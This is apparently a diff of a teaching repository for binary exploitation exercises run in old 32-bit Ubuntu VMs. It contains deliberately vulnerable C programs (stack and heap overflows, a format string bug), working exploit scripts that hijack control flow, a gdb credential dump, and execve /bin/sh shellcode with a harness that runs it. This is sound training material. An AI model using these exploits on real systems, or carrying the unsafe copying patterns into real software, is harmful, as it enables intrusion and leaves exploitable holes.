binary-exploitation

README.md

@@ -1 +1,28 @@
-# binary-exploitation
+# Binary Exploitation
+
+## ISO Files
+ISO files to execute the exploits in a VM: http://old-releases.ubuntu.com/releases/
+- Ubuntu 4 (32 Bit) system without protection mechanisms: ``warty-release-install-i386.iso``
+- Ubuntu 8 (32 Bit) system with simple protection mechanisms: ``ubuntu-8.10-desktop-i386.iso``
+- Ubuntu 10 (32 Bit) system with extended protection mechanisms: ``ubuntu-10.10-desktop-i386.iso``
+
+Replace in each VM in the '/etc/apt/sources.list' file 'archive.ubuntu.com' or 'security.ubuntu.com' with 'old-releases.ubuntu.com'
+
+## Hard Coded Credentials
+- exercise_1
+
+## Stack Overflow
+- exercise_2
+
+## Heap Overflow
+- exercise_3
+
+## Overwrite SEIP
+- exercise_4
+- exercise_6
+
+## Shellcode
+- exercise_5
+
+## ASLR
+- exercise_7

exercise_1/exploit.py

@@ -0,0 +1,24 @@
+import subprocess
+
+
+executable = "./access_control"
+
+
+res = subprocess.check_output(args=(
+    "gdb",
+    "-q",
+    "-x",
+    "gdb_instructions",
+    executable
+))
+username = res.split(b'"')[1].decode('utf-8')
+psw = res.split(b'"')[3].decode('utf-8')
+print(f"username = {username}")
+print(f"psw = {psw}")
+
+
+subprocess.call(args=(
+    executable,
+    username,
+    psw
+))

exercise_1/gdb_instructions

@@ -0,0 +1,5 @@
+# username in address:
+x /s 0x8048650
+# password in address:
+x /s 0x8048653
+q

exercise_2/access_control_stack.c

@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+char *salt = "$6$aGzikL66hsj/hs$";
+
+int auth(char *username, char *password)
+{
+	int result = 0;
+	char pw_user[20];
+	char * pw_hash;
+
+	// Prepare pw
+	strcpy(pw_user, password);
+	strcat(pw_user, username);
+
+	// Get Hash
+	printf("\n\nUser: %s\n", username);
+	printf("Password: %s\n", password);
+	pw_hash = crypt(pw_user, salt);
+	printf("Password Hash: %s\n", pw_hash);
+
+
+	if(strcmp(username, "00") == 0 &&
+		strcmp(pw_hash, "$6$aGzikL66hsj/hs$1KUTqGk7PDos.KzfFdMEjakeURJ5GzB.HtgVnKXDAEQZju2td0RSp0l0hLtMKWMpUpyF.V/JwZg79Nv5mZmQx/") == 0)
+	{
+		result = 1;
+	}
+
+	return result;
+}
+
+void printUsage()
+{
+	printf("Usage: auth <username> <password>\n");
+	exit(-1);
+}
+
+int main(int argc, char *argv[])
+{
+	if(argc < 3)
+		printUsage();
+
+	if(auth(argv[1], argv[2]) == 1)
+	{
+		printf("\n\n#####################################################\n");
+		printf("#                                                   #\n");
+		printf("#                !ACCESS GRANTED!                   #\n");
+		printf("#                                                   #\n");
+		printf("#####################################################\n\n\n");
+		printf("Welcome %s!\n", argv[1]);
+
+	}
+	else
+	{
+		printf("\n\n#####################################################\n");
+		printf("#                                                   #\n");
+		printf("#                 !ACCESS DENIED!                   #\n");
+		printf("#                                                   #\n");
+		printf("#####################################################\n\n\n");
+	}
+
+
+	return 0;
+}
+

exercise_2/exploit.sh

@@ -0,0 +1 @@
+./access_control_stack $(python3 -c 'print("\x01")') $(python3 -c 'print("\x03"*20)')

exercise_3/exploit.sh

@@ -0,0 +1 @@
+./get_secret $(python3 -c 'print("\x01"*80+"AIex-3")') AIex-3

exercise_3/get_secret.c

@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <gnu/libc-version.h>
+
+#define SECRETFILE "secret"
+#define PASSFILE "pass"
+
+void __attribute__((constructor))print_libc_version(){
+	printf("Glibc Version: %s\n", gnu_get_libc_version ());
+}
+
+
+void loadsecret(char *file, char *data, int len) {
+	FILE *fp;
+	fp = fopen(file, "r");
+	fgets(data, len, fp);
+}
+
+void usage(char *app) {
+	printf("Usage: %s username password\n\n", app);
+	exit(-1);
+}
+
+
+int main(int argc, char **argv) {
+
+	/* Allocating space on the heap for preventing overwrite of SEIP */
+	char *username = malloc(64);
+	char *password = malloc(64);
+	char *secret = malloc(128);
+
+	/* Checking for arguments */
+	if (argc < 3) usage(argv[0]);
+
+	/* Loading password from file */
+	loadsecret(PASSFILE, password, 20);
+	loadsecret(SECRETFILE, secret, 128);
+
+	/* Dropping privs, so nobody can get root */
+	setresuid(getuid(),getuid(),getuid());
+	setresgid(getgid(),getgid(),getgid());
+
+	strcpy(username, argv[1]);
+
+	if ( strncmp(password, argv[2],20) == 0 ) {
+		printf("Welcome %s!\n",username);
+		printf("The secret data for today is:\n%s\n",secret); 
+		/* beeing paranoid and deleting the data from memory */
+		free(secret);
+	}
+}
+
+
+
+
+

exercise_3/pass

@@ -0,0 +1 @@
+password

exercise_3/secret

@@ -0,0 +1 @@
+mypersonalsecret

exercise_4/control.c

@@ -0,0 +1,51 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+
+void unused() {
+	printf("This function will never be called?");
+}
+
+char * reverse(char *string, int len, int pointer)
+{
+	char buf[512];
+
+	printf("[DEBUG] len = %d\n", len);
+	printf("[DEBUG] buf @ %p\n", buf);
+
+	for(pointer = len - 1; pointer >= 0; pointer--)
+		buf[len - 1 - pointer] = *(string + pointer);
+
+	buf[len] = '\0';
+
+	printf("\nResult:\n");
+	printf(buf);
+}
+
+void printUsage(char *file)
+{
+	printf("Usage: %s <string>\n", file);
+	exit(-1);
+}
+
+int main(int argc, char *argv[])
+{
+	int len = 0;
+	int pointer = 0;
+
+	if(argc < 2)
+		printUsage(argv[0]);
+	else
+	{
+		// Set params
+		len = strlen(argv[1]);
+
+		reverse(argv[1], len, pointer);
+	}
+
+	printf("\n");
+
+	exit(0);
+}
+

exercise_4/exploit.c

@@ -0,0 +1,32 @@
+// Exploit for Ubuntu 4 (32 Bit) VM
+
+#include <string.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+int main() {
+	char* arg0 = "./control";
+	char arg1[529];
+
+	memset(arg1, 0x03, 528);
+	arg1[528] = '\0';
+
+	unsigned int addr = 0x080483d7;
+	addr = htonl(addr);
+	memcpy(arg1, (void*) &addr, 4);
+
+	unsigned int sebp = 0xbffffc98;
+	sebp = htonl(sebp);
+	memcpy(&arg1[4], (void*) &sebp, 4);
+
+	char* argv[3];
+	argv[0] = arg0;
+	argv[1] = arg1;
+	argv[2] = NULL;
+	char* envp[1];
+	envp[0] = NULL;
+
+	execve(arg0, argv, envp);
+
+	return 0;
+}

exercise_4/exploit.py

@@ -0,0 +1,9 @@
+# Exploit for Ubuntu 4 (32 Bit) VM
+
+
+import os
+
+
+os.system("gcc -g -Wall exploit.c")
+os.system("./a.out")
+os.system("rm a.out")

exercise_5/myshellcode.asm

@@ -0,0 +1,29 @@
+; Shellcode for Ubuntu 4 (32 Bit) VM
+; https://chromium.googlesource.com/chromiumos/docs/+/HEAD/constants/syscalls.md#x86-32_bit
+
+[SECTION .text]
+global _start
+
+_start:
+    xor eax, eax            ; eax = 0x0
+
+; Build stack:
+	push eax                ; Null-Byte of string
+	push 0x68732f6e
+	push 0x69622f2f         ; '//bin/sh'
+	mov ebx, esp            ; ebx = &'//bin/sh'
+	push eax                ; Null-Byte of argv
+	push ebx                ; Push pointer of '//bin/sh', argv[0]
+
+; Occupy eax:
+    mov al, 0x0b            ; 0x0b = execve
+; Occupy edx:
+	mov edx, esp
+	xor ecx, ecx
+	mov cl, 0x4
+	add edx, ecx            ; edx = &'\0'
+; Occupy ecx:
+    mov ecx, esp            ; ecx = argv[0]
+
+; Interrupt
+    int 0x80

exercise_5/myshellcode.sh

@@ -0,0 +1,22 @@
+# Shellcode for Ubuntu 4 (32 Bit) VM
+
+nasm -f elf myshellcode.asm;
+sc=$(
+    for i in $(objdump -M intel -d myshellcode.o | grep "^ " | cut -f2); do
+        echo -n "\x$i";
+    done
+);
+rm myshellcode.o;
+
+sc_file="sc.c";
+echo "char code[] = \"$sc\";" > $sc_file;
+echo >> $sc_file;
+echo "int main(int argc, char** argv) {" >> $sc_file;
+echo "    int (*func)();" >> $sc_file;
+echo "    func = (int (*)()) code;" >> $sc_file;
+echo "    (int)(*func)();" >> $sc_file;
+echo "}" >> $sc_file;
+
+gcc -g -Wall $sc_file;
+./a.out;
+rm a.out;

exercise_5/sc.c

@@ -0,0 +1,7 @@
+char code[] = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\xb0\x0b\x89\xe2\x31\xc9\xb1\x04\x01\xca\x89\xe1\xcd\x80";
+
+int main(int argc, char** argv) {
+    int (*func)();
+    func = (int (*)()) code;
+    (int)(*func)();
+}